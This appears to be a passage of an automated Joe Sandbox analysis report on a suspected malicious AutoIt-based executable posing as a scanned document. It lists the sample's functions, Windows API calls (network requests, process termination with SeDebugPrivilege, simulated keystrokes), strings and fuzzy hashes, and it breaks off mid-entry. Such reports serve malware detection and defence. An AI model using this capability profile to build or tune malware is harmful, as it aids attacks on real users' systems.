Instruction Fuzzy Hash: BB11A27610410CAFDB02EF99D882DDD3FA9FF05350F9144A5FA489F222DA31EE509B92

Function 00811410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00811459
OleUninitialize.OLE32(?,00000000), ref: 008114F8
UnregisterHotKey.USER32(?), ref: 008116DD
DestroyWindow.USER32(?), ref: 008524B9
FreeLibrary.KERNEL32(?), ref: 0085251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0085254B

Strings

close all, xrefs: 00811454

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 33f4836720447653196aac1c5105ae6fdcefec0154e206cdbdb5e3a0131f43bc
Instruction ID: 0121e52e40d1733420a2c099579fc18a332a37a9ad72994867a2798ca664cecb
Opcode Fuzzy Hash: 33f4836720447653196aac1c5105ae6fdcefec0154e206cdbdb5e3a0131f43bc
Instruction Fuzzy Hash: 75D16B317012228FDB19EF18C499A69F7A9FF06701F1441ADEA4AEB252DF30AC56CF51

Function 00815BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00815C7A

Part of subcall function 00815D0A: GetClientRect.USER32(?,?), ref: 00815D30
Part of subcall function 00815D0A: GetWindowRect.USER32(?,?), ref: 00815D71
Part of subcall function 00815D0A: ScreenToClient.USER32(?,?), ref: 00815D99

GetDC.USER32 ref: 008546F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00854708
SelectObject.GDI32(00000000,00000000), ref: 00854716
SelectObject.GDI32(00000000,00000000), ref: 0085472B
ReleaseDC.USER32(?,00000000), ref: 00854733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 008547C4

Strings

U, xrefs: 00854693

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: ce6811eb7fe0ad6dbb7e38da6f7ca7b13c742e86d9c61d9aa8efbd5f14bb9690
Instruction ID: 4137a0626c53febc464dc85a216585e7c5a77c3c538d68d66eb0a771974b94f7
Opcode Fuzzy Hash: ce6811eb7fe0ad6dbb7e38da6f7ca7b13c742e86d9c61d9aa8efbd5f14bb9690
Instruction Fuzzy Hash: DC71F134500209DFDF218F64C984AFA3BB5FF8A32AF145269ED55DA266C73098C9DF50

Function 0088359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 008835E4

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

LoadStringW.USER32(008E2390,?,00000FFF,?), ref: 0088360A

Strings

^ ERROR, xrefs: 008836C9
"%s" (%d) : ==> %s:%s%s, xrefs: 00883724
Line %d (File "%s"):, xrefs: 0088366B
"%s" (%d) : ==> %s:, xrefs: 00883742
Error: , xrefs: 008836EF

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 8a113526f825c8a9afbe0b3bdf93f679998c44feefbd3a9def675bcf442e7f19
Instruction ID: 0f5de109b6aee3f7c28e196da00b03782dbaa0bf05cc94a92d06263959965015
Opcode Fuzzy Hash: 8a113526f825c8a9afbe0b3bdf93f679998c44feefbd3a9def675bcf442e7f19
Instruction Fuzzy Hash: 87516D71800219AADF14EBA4DC52EEEBB39FF14710F144125F515B22A1EB346BD8DBA2

Function 008A8B02 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00829BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00829BB2

Part of subcall function 0082912D: GetCursorPos.USER32(?), ref: 00829141
Part of subcall function 0082912D: ScreenToClient.USER32(00000000,?), ref: 0082915E
Part of subcall function 0082912D: GetAsyncKeyState.USER32(00000001), ref: 00829183
Part of subcall function 0082912D: GetAsyncKeyState.USER32(00000002), ref: 0082919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 008A8B6B
ImageList_EndDrag.COMCTL32 ref: 008A8B71
ReleaseCapture.USER32 ref: 008A8B77
SetWindowTextW.USER32(?,00000000), ref: 008A8C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 008A8C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 008A8CFF

Strings

@GUI_DRAGFILE, xrefs: 008A8C9A
@GUI_DROPID, xrefs: 008A8C51

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: @GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-2107944366
Opcode ID: 177758609ba4b12c677a2dc409754fda1cbf803a5afcd5f040e23441ac9e9c6e
Instruction ID: be01ba573d3be391db96bffb16c152f7270b0145cc20a0938f51a47449e618c6
Opcode Fuzzy Hash: 177758609ba4b12c677a2dc409754fda1cbf803a5afcd5f040e23441ac9e9c6e
Instruction Fuzzy Hash: DE518C70104344AFEB04EF14DC99FAA77E4FF89714F40062DF992972A2DB709944CB62

Function 0088C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0088C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0088C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0088C2CA
GetLastError.KERNEL32 ref: 0088C322
SetEvent.KERNEL32(?), ref: 0088C336
InternetCloseHandle.WININET(00000000), ref: 0088C341

Strings

, xrefs: 0088C2BB

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 57cfda2516c468bb56fbc5fcc9fb543c32ae49d95b3317c9d0867f8e00151854
Instruction ID: 1a0653a032fd854d698666d7ba1758ee2ba5de86d6c5a34708329432db1888ac
Opcode Fuzzy Hash: 57cfda2516c468bb56fbc5fcc9fb543c32ae49d95b3317c9d0867f8e00151854
Instruction Fuzzy Hash: 31317AB1600608AFE721AFA99C88ABB7BFCFB4A744F10851EF446D2644DB34DD059B71

Function 0087989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00853AAF,?,?,Bad directive syntax error,008ACC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 008798BC
LoadStringW.USER32(00000000,?,00853AAF,?), ref: 008798C3

Part of subcall function 00819CB3: _wcslen.LIBCMT ref: 00819CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00879987

Strings

Line %d (File "%s"):, xrefs: 0087992D
Error: , xrefs: 00879955
., xrefs: 0087996D
Line %d:, xrefs: 00879912
%s (%d) : ==> %s.: %s %s, xrefs: 008798F1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 9a95b4026de28044d361661d3e96e080e2ba0fdd997869d1ecbdd9cc9bed00db
Instruction ID: ccaa9893f79439ecd07958b490e1ceb94e27209c439c66ac3d31d449154c991a
Opcode Fuzzy Hash: 9a95b4026de28044d361661d3e96e080e2ba0fdd997869d1ecbdd9cc9bed00db
Instruction Fuzzy Hash: BF21943180021EABDF15AF94CC06EEE7779FF14300F044466F629A21A2EB75A668DB51

Function 0087209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 008720AB
GetClassNameW.USER32(00000000,?,00000100), ref: 008720C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0087214D

Strings

largeicons, xrefs: 008720E1
SHELLDLL_DefView, xrefs: 008720CC
details, xrefs: 008720FB
list, xrefs: 0087212F
smallicons, xrefs: 00872115

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: c8cc2bcbbd6122309f33db6f031275068684d22569dc1dd94fdecc8b70995829
Instruction ID: 455a3bcfd63462d7f9828b0d3bd4cb32b8f51ba3cbb41299efa2c97e663841e1
Opcode Fuzzy Hash: c8cc2bcbbd6122309f33db6f031275068684d22569dc1dd94fdecc8b70995829
Instruction Fuzzy Hash: 35115976288706B9FA01A228DC07CA6339CFB15324F20411BFB08E41D5FF65F8015664

Function 00848D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39ca2a283f43fcf816b3fd5933dccb176b5d82d72a68527a9a564bebf7fc9ab8
Instruction ID: d2a2706be8c83b768b2bfb3ae96e9dd842ac08a2677cd3568d566c629d5b9065
Opcode Fuzzy Hash: 39ca2a283f43fcf816b3fd5933dccb176b5d82d72a68527a9a564bebf7fc9ab8
Instruction Fuzzy Hash: CDC1AD74E0424DEFDB21DFA8D841BAEBBB4FF49310F144199E954EB292CB709941CB61

Function 0084CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0084CEB7
_free.LIBCMT ref: 0084CF22
_free.LIBCMT ref: 0084CF48
_free.LIBCMT ref: 0084CF71
_free.LIBCMT ref: 0084CFA9
_free.LIBCMT ref: 0084CFDA
_free.LIBCMT ref: 0084D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0084D09C
_free.LIBCMT ref: 0084D0B5

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 104fbd1e3db9e59f7d787d9822dfccaaede7c161e6fac741825a7d1b9afd429d
Instruction ID: 6c13c3b7d788813796ffe2df883a7b09285bd27e6b3c63a7d1c5d020a54e88ab
Opcode Fuzzy Hash: 104fbd1e3db9e59f7d787d9822dfccaaede7c161e6fac741825a7d1b9afd429d
Instruction Fuzzy Hash: 9D614771A0534CAFDB21AFB89C81A6E7BA9FF01310F04416DF940DB242DFB59D4587A1

Function 008A50D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 008A5186
ShowWindow.USER32(?,00000000), ref: 008A51C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 008A51CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 008A51D1

Part of subcall function 008A6FBA: DeleteObject.GDI32(00000000), ref: 008A6FE6

GetWindowLongW.USER32(?,000000F0), ref: 008A520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008A521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008A524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 008A5287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 008A5296

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 40e58569590ef448322b2ea44f27cabb24cb1ce60d6fdeee4ce7d30785d2bca4
Instruction ID: 2861fad47e6c3b1e08ca80a80d1d6b60ebe12fd2e9ea240c8cda918353108ac3
Opcode Fuzzy Hash: 40e58569590ef448322b2ea44f27cabb24cb1ce60d6fdeee4ce7d30785d2bca4
Instruction Fuzzy Hash: BB518D30A40A08BEFF209F28DC4ABE93BA5FB06325F144011F625DAAE1C775A9D0DB41

Function 00828B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00866890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 008668A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 008668B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 008668D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 008668F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00828874,00000000,00000000,00000000,000000FF,00000000), ref: 00866901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0086691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00828874,00000000,00000000,00000000,000000FF,00000000), ref: 0086692D

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: f5d7cf573d1d2068c26b4063f15759f02af10a8a70db96d3bfb28e69db321341
Instruction ID: ed26b91fcfb24290af97a71a90fe5027698f401c8a4435e4157e7dfb315b129a
Opcode Fuzzy Hash: f5d7cf573d1d2068c26b4063f15759f02af10a8a70db96d3bfb28e69db321341
Instruction Fuzzy Hash: FC516970600249EFEF20CF24DC95BAA7BB5FB58764F104528F956D72A0EB70A9A0DB50

Function 0088C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0088C182
GetLastError.KERNEL32 ref: 0088C195
SetEvent.KERNEL32(?), ref: 0088C1A9

Part of subcall function 0088C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0088C272
Part of subcall function 0088C253: GetLastError.KERNEL32 ref: 0088C322
Part of subcall function 0088C253: SetEvent.KERNEL32(?), ref: 0088C336
Part of subcall function 0088C253: InternetCloseHandle.WININET(00000000), ref: 0088C341

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 70dafde0cbd10a6896cc8c70410a1176a16e93a1b4687c2da6be17dadabdb606
Instruction ID: e0b192aa8881b0a8b3483124d3fe2fb4f9690ae3600b3a10c2af74b3adfa76cb
Opcode Fuzzy Hash: 70dafde0cbd10a6896cc8c70410a1176a16e93a1b4687c2da6be17dadabdb606
Instruction Fuzzy Hash: A5318D71200605AFEB21AFB9DC48A76BBF8FF19300B00841DF956C2A64DB31E814DBB0

Function 008725A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00873A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00873A57
Part of subcall function 00873A3D: GetCurrentThreadId.KERNEL32 ref: 00873A5E
Part of subcall function 00873A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008725B3), ref: 00873A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 008725BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008725DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 008725DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 008725E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00872601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00872605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0087260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00872623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00872627

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: b4529ef30112c3ab66f49999aaf6ede03c4530d37cfc7264c8e9015c4722e221
Instruction ID: 4a6d797f6641b250759e5e3db7d788cc37c6f5edcb23b30a7f3db93aa274b435
Opcode Fuzzy Hash: b4529ef30112c3ab66f49999aaf6ede03c4530d37cfc7264c8e9015c4722e221
Instruction Fuzzy Hash: 9C01D431390624BBFB1067689C8AF597F59FB5EB12F104005F318EE0D5C9E264459A6A

Function 00871803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00871449,?,?,00000000), ref: 0087180C
HeapAlloc.KERNEL32(00000000,?,00871449,?,?,00000000), ref: 00871813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00871449,?,?,00000000), ref: 00871828
GetCurrentProcess.KERNEL32(?,00000000,?,00871449,?,?,00000000), ref: 00871830
DuplicateHandle.KERNEL32(00000000,?,00871449,?,?,00000000), ref: 00871833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00871449,?,?,00000000), ref: 00871843
GetCurrentProcess.KERNEL32(00871449,00000000,?,00871449,?,?,00000000), ref: 0087184B
DuplicateHandle.KERNEL32(00000000,?,00871449,?,?,00000000), ref: 0087184E
CreateThread.KERNEL32(00000000,00000000,00871874,00000000,00000000,00000000), ref: 00871868

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 6c3d7da245e2f464ee413e4d9053f81122bf09f9f4576019d307936b5a776a68
Instruction ID: 61cc98bf464bdc736debd4142b79081080866b709bbacb125a84cc2bfce83dc1
Opcode Fuzzy Hash: 6c3d7da245e2f464ee413e4d9053f81122bf09f9f4576019d307936b5a776a68
Instruction Fuzzy Hash: B701AC75340304BFF610ABA5DC4DF577BACFB8AB11F004411FA05DB691DA7498008B20

Function 0089A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0087D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0087D501
Part of subcall function 0087D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0087D50F
Part of subcall function 0087D4DC: CloseHandle.KERNEL32(00000000), ref: 0087D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0089A16D
GetLastError.KERNEL32 ref: 0089A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0089A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0089A268
GetLastError.KERNEL32(00000000), ref: 0089A273
CloseHandle.KERNEL32(00000000), ref: 0089A2C4

Strings

SeDebugPrivilege, xrefs: 0089A18F

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

